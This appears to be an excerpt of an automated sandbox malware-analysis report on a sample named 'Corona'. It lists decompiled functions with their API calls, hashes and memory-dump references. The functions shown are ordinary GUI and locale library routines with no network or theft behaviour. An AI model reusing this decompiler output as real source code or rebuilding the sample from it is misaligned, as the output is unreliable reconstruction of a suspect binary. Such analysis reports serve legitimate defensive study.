                                  • Instruction Fuzzy Hash: D4116DB26042095FEB20FA5ACD81F2773DCDB54314B15043AF96AD3742EAA9FC00876D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042191C, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E0042191C(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E0042037C(_t22);
					}
					_t21 = E0041DDB4( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L0040638C();
						_t21 = E0041D6C4(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L004060D4();
							_push(0xe);
							_push(_t38);
							L004060D4();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L004065C4();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                  0x0042191c
                                  0x00421920
                                  0x00421922
                                  0x00421929
                                  0x00421943
                                  0x00421949
                                  0x0042194b
                                  0x0042194b
                                  0x00421962
                                  0x00421967
                                  0x00421969
                                  0x0042196e
                                  0x00421970
                                  0x00421972
                                  0x00421977
                                  0x0042197c
                                  0x00421982
                                  0x004219ab
                                  0x004219ab
                                  0x00421984
                                  0x00421984
                                  0x00421986
                                  0x00421987
                                  0x0042198e
                                  0x00421990
                                  0x00421991
                                  0x00421996
                                  0x004219a1
                                  0x004219a5
                                  0x00000000
                                  0x004219a7
                                  0x004219a7
                                  0x004219a7
                                  0x004219a5
                                  0x004219ad
                                  0x004219b2
                                  0x004219b5
                                  0x004219ba
                                  0x004219ba
                                  0x004219bd
                                  0x004219be
                                  0x004219c0
                                  0x004219c9
                                  0x004219cb
                                  0x00000000
                                  0x004219cb
                                  0x004219c9
                                  0x0042196e
                                  0x004219d3

                                  APIs
                                  • 72E7AC50.USER32(00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421972
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421987
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421991
                                  • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219B5
                                  • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219C0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B380CreateHalftonePalette
                                  • String ID:
                                  • API String ID: 178651289-0
                                  • Opcode ID: 745330e27b98e9b86da158c64362648435f0f5a46d5e92af5e4fdbc6213763cb
                                  • Instruction ID: 8d5cdc080da6f53d21447fcc318a7ddb3ae35b8b985382ef6a905b509f1b5636
                                  • Opcode Fuzzy Hash: 745330e27b98e9b86da158c64362648435f0f5a46d5e92af5e4fdbc6213763cb
                                  • Instruction Fuzzy Hash: 0C11D3A17402A99EEB20EF25A4517EF3BD1AF65358F44012BFC409A2D1D7B88CD4C3A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044AF84, Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E0044AF84(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x450c1c != 0) {
					_t16 = E00435154(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E00434EF4(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E00434EF4(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x450c1c(E00434EF4(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x00450CA0 |  *0x00450CA8);
						} else {
							SetWindowLongA(E00434EF4(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E00434EF4(_t38);
							_push(_t37);
							L0040659C();
							return _t37;
						}
					}
				}
				return _t16;
			}







                                  0x0044af84
                                  0x0044af86
                                  0x0044af8c
                                  0x0044afa1
                                  0x0044afa8
                                  0x0044afbd
                                  0x0044afc6
                                  0x0044afd7
                                  0x0044afea
                                  0x0044afea
                                  0x00000000
                                  0x0044b02c
                                  0x0044b03d
                                  0x0044b042
                                  0x0044b047
                                  0x0044b049
                                  0x0044b04d
                                  0x0044b052
                                  0x0044b053
                                  0x00000000
                                  0x0044b053
                                  0x0044afc6
                                  0x0044afa8
                                  0x0044b05a

                                  APIs
                                  • GetWindowLongA.USER32 ref: 0044AFB8
                                  • SetWindowLongA.USER32 ref: 0044AFEA
                                  • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,00448B78), ref: 0044B024
                                  • SetWindowLongA.USER32 ref: 0044B03D
                                  • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,00448B78), ref: 0044B053
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$Long$AttributesB330Layered
                                  • String ID:
                                  • API String ID: 1770052509-0
                                  • Opcode ID: da4f438ccc0c2655b17341db793f411034f1a4cd685870796a2e7dd830a371ee
                                  • Instruction ID: 55c6bc1a56bdc3ef45ea7b18f5cc85fd6322bbc83fb62b42dde41f4f702a290d
                                  • Opcode Fuzzy Hash: da4f438ccc0c2655b17341db793f411034f1a4cd685870796a2e7dd830a371ee
                                  • Instruction Fuzzy Hash: 4411205160438025DB11BF794C89F8B16485F06319F05197ABC65EB2D3CA7CCC48C77C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041DD1C, Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E0041DD1C(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x45288c == 0) {
					return _v5;
				} else {
					_push(0);
					L0040638C();
					_v12 = __eax;
					_push(_t32);
					_push(0x41dda2);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L004060D4();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x45288c; // 0xa8080a0b
						_push(_t18);
						L004060FC();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x45288c; // 0xa8080a0b
						_push(_t21);
						L004060FC();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x41dda9);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L004065C4();
					return _t16;
				}
			}













                                  0x0041dd1d
                                  0x0041dd1f
                                  0x0041dd25
                                  0x0041dd30
                                  0x0041ddb0
                                  0x0041dd32
                                  0x0041dd32
                                  0x0041dd34
                                  0x0041dd39
                                  0x0041dd3e
                                  0x0041dd3f
                                  0x0041dd44
                                  0x0041dd47
                                  0x0041dd4a
                                  0x0041dd4c
                                  0x0041dd4f
                                  0x0041dd50
                                  0x0041dd58
                                  0x0041dd5d
                                  0x0041dd5e
                                  0x0041dd60
                                  0x0041dd62
                                  0x0041dd67
                                  0x0041dd68
                                  0x0041dd75
                                  0x0041dd76
                                  0x0041dd78
                                  0x0041dd7a
                                  0x0041dd7f
                                  0x0041dd80
                                  0x0041dd85
                                  0x0041dd85
                                  0x0041dd8b
                                  0x0041dd8e
                                  0x0041dd91
                                  0x0041dd96
                                  0x0041dd99
                                  0x0041dd9a
                                  0x0041dd9c
                                  0x0041dda1
                                  0x0041dda1

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041DD34
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041DDA2,?,00000000), ref: 0041DD50
                                  • 72E7AEA0.GDI32(A8080A0B,00000000,00000008,?,?,00000068,00000000,0041DDA2,?,00000000), ref: 0041DD68
                                  • 72E7AEA0.GDI32(A8080A0B,00000008,00000008,?,A8080A0B,00000000,00000008,?,?,00000068,00000000,0041DDA2,?,00000000), ref: 0041DD80
                                  • 72E7B380.USER32(00000000,?,0041DDA9,0041DDA2,?,00000000), ref: 0041DD9C
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: 13b3b2454f4165ef9ebb1174be2e02a6750807417232f98612ec0e030abf8979
                                  • Instruction ID: 69c70b2ea4871a856222a0c0465084c80e63c64e7c9f3353842cdc16cf339368
                                  • Opcode Fuzzy Hash: 13b3b2454f4165ef9ebb1174be2e02a6750807417232f98612ec0e030abf8979
                                  • Instruction Fuzzy Hash: D1110875588304BEFB44DBE59C42FA97BE8E745704F40C46BF6049B1C1D97A94548728
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AC84, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E0040AC84(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40ad1b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040A9FC(GetThreadLocale(), 0x40ad30, 0x100b,  &_v8);
				_t29 = E00407DB8(0x40ad30, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040ABD0, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x45276c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040AC0C, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040AD22);
				return E00403E4C( &_v8);
			}










                                  0x0040ac84
                                  0x0040ac87
                                  0x0040ac8c
                                  0x0040ac8d
                                  0x0040ac92
                                  0x0040ac95
                                  0x0040acab
                                  0x0040acbd
                                  0x0040acc7
                                  0x0040acd7
                                  0x0040acdc
                                  0x0040ace1
                                  0x0040ace6
                                  0x0040ace6
                                  0x0040acec
                                  0x0040acef
                                  0x0040acef
                                  0x0040ad00
                                  0x0040ad00
                                  0x0040ad07
                                  0x0040ad0a
                                  0x0040ad0d
                                  0x0040ad1a

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040AD1B,?,?,00000000), ref: 0040AC9C
                                    • Part of subcall function 0040A9FC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AA1A
                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040AD1B,?,?,00000000), ref: 0040ACCC
                                  • EnumCalendarInfoA.KERNEL32(Function_0000ABD0,00000000,00000000,00000004), ref: 0040ACD7
                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040AD1B,?,?,00000000), ref: 0040ACF5
                                  • EnumCalendarInfoA.KERNEL32(Function_0000AC0C,00000000,00000000,00000003), ref: 0040AD00
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread$CalendarEnum
                                  • String ID:
                                  • API String ID: 4102113445-0
                                  • Opcode ID: 355b68bc9cf761234c193b6fadf7cdce9eeef19d5889bb975f1e2c1e7999d337
                                  • Instruction ID: c8a73be62a9e5c50b15ee97d793cbbd5b7efea7c2e025363f4cde64f9b6e9962
                                  • Opcode Fuzzy Hash: 355b68bc9cf761234c193b6fadf7cdce9eeef19d5889bb975f1e2c1e7999d337
                                  • Instruction Fuzzy Hash: CD01F2316047046BEB01AB65CC12F6B725CDF46B18F614537F500BAAC1EA7C9F109AAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044C5B4, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044C5B4() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x452bc8 != 0) {
					_t10 =  *0x452bc8; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x452bc8 = 0;
				if( *0x452bcc != 0) {
					_t2 =  *0x452bc4; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x452bc0) {
						_t8 =  *0x452bcc; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x452bcc; // 0x0
					CloseHandle(_t5);
					 *0x452bcc = 0;
					return 0;
				}
				return 0;
			}







                                  0x0044c5bb
                                  0x0044c5bd
                                  0x0044c5c3
                                  0x0044c5c3
                                  0x0044c5ca
                                  0x0044c5d6
                                  0x0044c5d8
                                  0x0044c5de
                                  0x0044c5ee
                                  0x0044c5f2
                                  0x0044c5f8
                                  0x0044c5f8
                                  0x0044c5fd
                                  0x0044c603
                                  0x0044c60a
                                  0x00000000
                                  0x0044c60a
                                  0x0044c60f

                                  APIs
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 0044C5C3
                                  • SetEvent.KERNEL32(00000000,0044E932,00000000,0044D9DF,?,?,0044F588,00000001,0044DA9F,?,?,?,0044F588), ref: 0044C5DE
                                  • GetCurrentThreadId.KERNEL32 ref: 0044C5E3
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0044E932,00000000,0044D9DF,?,?,0044F588,00000001,0044DA9F,?,?,?,0044F588), ref: 0044C5F8
                                  • CloseHandle.KERNEL32(00000000,00000000,0044E932,00000000,0044D9DF,?,?,0044F588,00000001,0044DA9F,?,?,?,0044F588), ref: 0044C603
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                  • String ID:
                                  • API String ID: 2429646606-0
                                  • Opcode ID: e2381fa4031b83fdd8dc8bfe1b6ff9b4b78a7dd2d095956982b4b88e19e70640
                                  • Instruction ID: 8e8d116a209ff229685a45bfd69fd15fb1fd99825208448899296e255fd875e9
                                  • Opcode Fuzzy Hash: e2381fa4031b83fdd8dc8bfe1b6ff9b4b78a7dd2d095956982b4b88e19e70640
                                  • Instruction Fuzzy Hash: FAF09E715007039AD755EF65DD89A1A3394A706316B14493BF024F71E2C6BCF440CF2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00439174, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00439174(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _t125;
				int _t126;
				int _t140;
				int _t147;
				intOrPtr* _t175;
				int _t186;
				void* _t191;
				intOrPtr* _t209;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				int _t232;
				intOrPtr _t233;
				int _t236;
				intOrPtr* _t242;
				intOrPtr _t262;
				intOrPtr _t278;
				intOrPtr _t289;
				int _t297;
				int _t300;
				int _t302;
				int _t303;
				int _t304;
				void* _t307;
				void* _t309;
				void* _t315;

				_t315 = __fp0;
				_t306 = _t307;
				_v76 = 0;
				_t242 = __edx;
				_v8 = __eax;
				_push(_t307);
				_push(0x43954c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307 + 0xffffffb8;
				_t125 =  *__edx;
				_t309 = _t125 - 0x202;
				if(_t309 > 0) {
					_t126 = _t125 - 0x203;
					__eflags = _t126;
					if(__eflags == 0) {
						E00406760( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
						_t297 = E00437C04(_v8,  &_v20,  &_v72, __eflags);
						__eflags = _t297;
						if(_t297 != 0) {
							__eflags =  *(_t297 + 4);
							if( *(_t297 + 4) != 0) {
								__eflags = _v20 - 2;
								if(_v20 == 2) {
									E0042D054();
									E0042F4D8( *(_t297 + 4), 0, 0, 1);
								}
							}
						}
						L47:
						if( *((short*)(_v8 + 0x32)) != 0) {
							 *((intOrPtr*)(_v8 + 0x30))();
						}
						L49:
						_pop(_t262);
						 *[fs:eax] = _t262;
						_push(0x439553);
						return E00403E4C( &_v76);
					}
					_t140 = _t126 - 0xae2d;
					__eflags = _t140;
					if(_t140 == 0) {
						 *((intOrPtr*)(_v8 + 0x30))();
						__eflags =  *(__edx + 0xc);
						if( *(__edx + 0xc) != 0) {
							goto L49;
						}
						_t300 =  *((intOrPtr*)( *_v8 + 4))();
						__eflags = _v20 - 0x12;
						if(_v20 != 0x12) {
							__eflags = _t300;
							if(_t300 == 0) {
								goto L49;
							}
							_t147 = _v20 - 2;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								E0042E194(_t300,  &_v36);
								 *((intOrPtr*)( *_v8))();
								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
								E0042E7E4(_t300,  &_v76);
								E00403EA0( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L49;
							}
							__eflags = _t147 != 0x12;
							if(_t147 != 0x12) {
								goto L49;
							}
							goto L46;
						}
						E00403E4C( *((intOrPtr*)(__edx + 8)) + 0x38);
						goto L49;
					} else {
						__eflags = _t140 == 0x12;
						if(_t140 == 0x12) {
							_t175 =  *((intOrPtr*)(__edx + 8));
							__eflags =  *_t175 - 0xb00b;
							if( *_t175 == 0xb00b) {
								E0043905C(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)));
							}
						}
						goto L47;
					}
				}
				if(_t309 == 0) {
					__eflags =  *(_v8 + 0x60);
					if(__eflags != 0) {
						E00438BA8(_v8, __eflags);
					} else {
						E00406760( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
						_t302 = E00437C04(_v8,  &_v20,  &_v16, __eflags);
						__eflags = _t302;
						if(_t302 != 0) {
							__eflags = _v20 - 0x14;
							if(_v20 == 0x14) {
								_t295 =  *((intOrPtr*)(_t302 + 4));
								_t278 =  *0x4436a0; // 0x4436ec
								_t186 = E00403288( *((intOrPtr*)(_t302 + 4)), _t278);
								__eflags = _t186;
								if(_t186 == 0) {
									E0042E704(_t295, 0);
								} else {
									E0044A5E8(_t295,  &_v20);
								}
							}
						}
					}
					goto L47;
				}
				_t191 = _t125 - 0x20;
				if(_t191 == 0) {
					GetCursorPos( &_v16);
					E0042E338( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
					_v16.x = _v72;
					_v16.y = _v68;
					__eflags =  *((short*)(_t242 + 8)) - 1;
					if( *((short*)(_t242 + 8)) != 1) {
						goto L47;
					}
					__eflags = E00434EF4( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
					if(__eflags != 0) {
						goto L47;
					}
					__eflags = E00433A24( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
					if(__eflags <= 0) {
						goto L47;
					}
					_t303 = E00437C04(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t303;
					if(_t303 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(_v20 != 0x12) {
						goto L47;
					}
					_t209 =  *0x451104; // 0x452bb4
					SetCursor(E0044BCE8( *_t209,  *((short*)(0x450af8 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
					 *((intOrPtr*)(_t242 + 0xc)) = 1;
					goto L49;
				}
				_t213 = _t191 - 0x1e0;
				if(_t213 == 0) {
					_t214 = _v8;
					__eflags =  *(_t214 + 0x60);
					if( *(_t214 + 0x60) != 0) {
						E00438C5C(_v8);
						E00406760( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
						_t219 = _v8;
						 *(_t219 + 0x50) = _v72;
						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
						E004390E4(_t306);
						E00438C5C(_v8);
					}
					goto L47;
				}
				if(_t213 == 1) {
					E00406760( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
					_t256 =  &_v20;
					_t304 = E00437C04(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t304;
					if(_t304 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(__eflags != 0) {
						__eflags = _v20 - 2;
						if(_v20 != 2) {
							goto L47;
						}
						_t232 = PeekMessageA( &_v64, E00434EF4( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
						__eflags = _t232;
						if(_t232 == 0) {
							_t289 =  *0x42abf0; // 0x42ac3c
							_t236 = E00403288( *((intOrPtr*)(_t304 + 4)), _t289);
							__eflags = _t236;
							if(_t236 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc4))();
							}
						}
						_t233 =  *((intOrPtr*)(_t304 + 4));
						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
						if( *((char*)(_t233 + 0x9b)) == 1) {
							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
							if( *((char*)(_t233 + 0x5d)) == 1) {
								E0042EE80(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
							}
						}
						goto L49;
					}
					E00438B48(_v8,  &_v16, _t304, __eflags);
				} else {
				}
			}








































                                  0x00439174
                                  0x00439175
                                  0x0043917f
                                  0x00439182
                                  0x00439184
                                  0x00439189
                                  0x0043918a
                                  0x0043918f
                                  0x00439192
                                  0x00439195
                                  0x00439197
                                  0x0043919c
                                  0x004391c0
                                  0x004391c0
                                  0x004391c5
                                  0x00439246
                                  0x00439259
                                  0x0043925b
                                  0x0043925d
                                  0x00439263
                                  0x00439267
                                  0x0043926d
                                  0x00439271
                                  0x00439277
                                  0x00439285
                                  0x00439285
                                  0x00439271
                                  0x00439267
                                  0x00439521
                                  0x00439529
                                  0x00439533
                                  0x00439533
                                  0x00439536
                                  0x00439538
                                  0x0043953b
                                  0x0043953e
                                  0x0043954b
                                  0x0043954b
                                  0x004391c7
                                  0x004391c7
                                  0x004391cc
                                  0x0043945f
                                  0x00439462
                                  0x00439466
                                  0x00000000
                                  0x00000000
                                  0x0043947d
                                  0x0043947f
                                  0x00439483
                                  0x00439495
                                  0x00439497
                                  0x00000000
                                  0x00000000
                                  0x004394a0
                                  0x004394a0
                                  0x004394a3
                                  0x004394ae
                                  0x004394b3
                                  0x004394c2
                                  0x004394cc
                                  0x004394d7
                                  0x004394e7
                                  0x004394f7
                                  0x004394ff
                                  0x0043950d
                                  0x0043951b
                                  0x0043951c
                                  0x0043951d
                                  0x0043951e
                                  0x00000000
                                  0x0043951e
                                  0x004394a5
                                  0x004394a8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004394a8
                                  0x0043948b
                                  0x00000000
                                  0x004391d2
                                  0x004391d2
                                  0x004391d5
                                  0x004391db
                                  0x004391de
                                  0x004391e4
                                  0x004391f3
                                  0x004391f3
                                  0x004391e4
                                  0x00000000
                                  0x004391d5
                                  0x004391cc
                                  0x0043919e
                                  0x00439342
                                  0x00439346
                                  0x004393a6
                                  0x00439348
                                  0x0043934e
                                  0x00439361
                                  0x00439363
                                  0x00439365
                                  0x0043936b
                                  0x0043936f
                                  0x00439375
                                  0x0043937a
                                  0x00439380
                                  0x00439385
                                  0x00439387
                                  0x00439399
                                  0x00439389
                                  0x0043938b
                                  0x0043938b
                                  0x00439387
                                  0x0043936f
                                  0x00439365
                                  0x00000000
                                  0x00439346
                                  0x004391a4
                                  0x004391a7
                                  0x004393b4
                                  0x004393c5
                                  0x004393cd
                                  0x004393d3
                                  0x004393d6
                                  0x004393db
                                  0x00000000
                                  0x00000000
                                  0x004393ec
                                  0x004393ef
                                  0x00000000
                                  0x00000000
                                  0x00439400
                                  0x00439402
                                  0x00000000
                                  0x00000000
                                  0x00439416
                                  0x00439418
                                  0x0043941a
                                  0x00000000
                                  0x00000000
                                  0x00439420
                                  0x00439424
                                  0x00000000
                                  0x00000000
                                  0x00439439
                                  0x00439446
                                  0x0043944b
                                  0x00000000
                                  0x0043944b
                                  0x004391ad
                                  0x004391b2
                                  0x004391fd
                                  0x00439200
                                  0x00439204
                                  0x0043920d
